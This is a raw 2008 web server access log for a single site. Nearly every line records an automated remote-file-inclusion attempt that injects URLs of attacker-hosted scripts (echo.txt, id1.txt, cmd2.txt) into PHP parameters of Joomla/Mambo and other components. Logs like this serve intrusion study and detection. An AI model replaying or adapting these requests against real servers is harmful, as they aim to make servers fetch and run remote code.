193.19.139.89 - - [05/May/2008:11:18:15 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:18:41 -0700] "GET /logs/access_080120.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:18:42 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:18:43 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 46126 "-" "libwww-perl/5.808" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:21 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:22 -0700] "GET //login.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:25 -0700] "GET /logs//login.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:19:27 -0700] "GET /logs/access_080309.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:28 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:28 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:28 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:30 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:19:31 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.235.226 - - [05/May/2008:11:19:34 -0700] "GET /logs/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.235.226 - - [05/May/2008:11:19:34 -0700] "GET /posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:19:38 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:19:43 -0700] "GET /logs/access_080211.log//login.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:20:15 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:20:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:20:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:20:16 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:21:08 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:21:57 -0700] "GET /logs/access_080111.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:22:03 -0700] "GET //?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:22:03 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 46131 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:22:29 -0700] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:22:50 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:23:10 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:23:19 -0700] "GET /logs/access_080111.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:23:19 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 46131 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:23:20 -0700] "GET /logs/access_080106.log/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
216.6.180.69 - - [05/May/2008:11:23:20 -0700] "GET /extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
216.6.180.69 - - [05/May/2008:11:23:20 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
219.94.128.57 - - [05/May/2008:11:23:34 -0700] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.35 - - [05/May/2008:11:23:44 -0700] "GET /logs/access_080106.log/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
64.185.237.35 - - [05/May/2008:11:23:45 -0700] "GET /extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
64.185.237.35 - - [05/May/2008:11:23:45 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
82.165.148.225 - - [05/May/2008:11:24:08 -0700] "GET //config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:24:14 -0700] "GET /logs/access.log/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:24:14 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:24:14 -0700] "GET /extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:24:14 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:24:14 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:24:15 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:24:25 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:24:25 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:24:26 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
38.99.95.154 - - [05/May/2008:11:24:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
38.99.95.154 - - [05/May/2008:11:24:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.35 - - [05/May/2008:11:24:59 -0700] "GET /logs/access.log/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [05/May/2008:11:24:59 -0700] "GET /extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [05/May/2008:11:25:00 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:11:25:06 -0700] "GET /logs/index.php?loadadminpage=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:11:25:11 -0700] "GET /index.php?loadadminpage=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:25:25 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.35 - - [05/May/2008:11:25:29 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [05/May/2008:11:25:29 -0700] "GET /extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.30.245.149 - - [05/May/2008:11:25:30 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:25:31 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
196.30.245.149 - - [05/May/2008:11:25:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:25:31 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:25:32 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:25:33 -0700] "GET /extras/ext_cats.php?dir_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:25:38 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:25:43 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:11:25:45 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:11:25:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.19.139.89 - - [05/May/2008:11:26:13 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:26:14 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:26:25 -0700] "GET /logs/access_080224.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:26:51 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:26:51 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:26:54 -0700] "GET /logs/%22FrontAccounting%22http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:26:59 -0700] "GET /%22FrontAccounting%22http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:27:20 -0700] "GET /logs/access.log/index.php?prod=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.19.139.89 - - [05/May/2008:11:27:23 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:27:27 -0700] "GET /logs/index.php?prod=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:27:30 -0700] "GET /index.php?prod=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:27:35 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:27:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:27:37 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.201.13.98 - - [05/May/2008:11:28:32 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:28:35 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 46131 "-" "libwww-perl/5.808" "www.dmulk.com"
67.201.13.98 - - [05/May/2008:11:28:38 -0700] "GET //index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:11:28:42 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:29:03 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:29:08 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:29:09 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:29:23 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:29:42 -0700] "GET /logs/phfito/phfito-post?SRC_PATH=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:29:43 -0700] "GET /phfito/phfito-post?SRC_PATH=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
83.19.144.26 - - [05/May/2008:11:29:45 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [05/May/2008:11:29:51 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [05/May/2008:11:29:52 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:30:10 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:11:30:13 -0700] "GET /logs/access_080309.log/index.php?option=com_joomap&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [05/May/2008:11:30:15 -0700] "GET /logs/access_080211.log/test.php?page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [05/May/2008:11:30:16 -0700] "GET /test.php?page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [05/May/2008:11:30:16 -0700] "GET /logs/test.php?page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:30:18 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:11:30:19 -0700] "GET /logs/index.php?option=com_joomap&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:11:30:21 -0700] "GET /index.php?option=com_joomap&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:30:51 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:30:51 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:30:52 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:30:57 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:31:20 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:31:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:31:20 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [05/May/2008:11:31:21 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:31:25 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:31:34 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:31:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:31:35 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:11:31:41 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:11:31:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
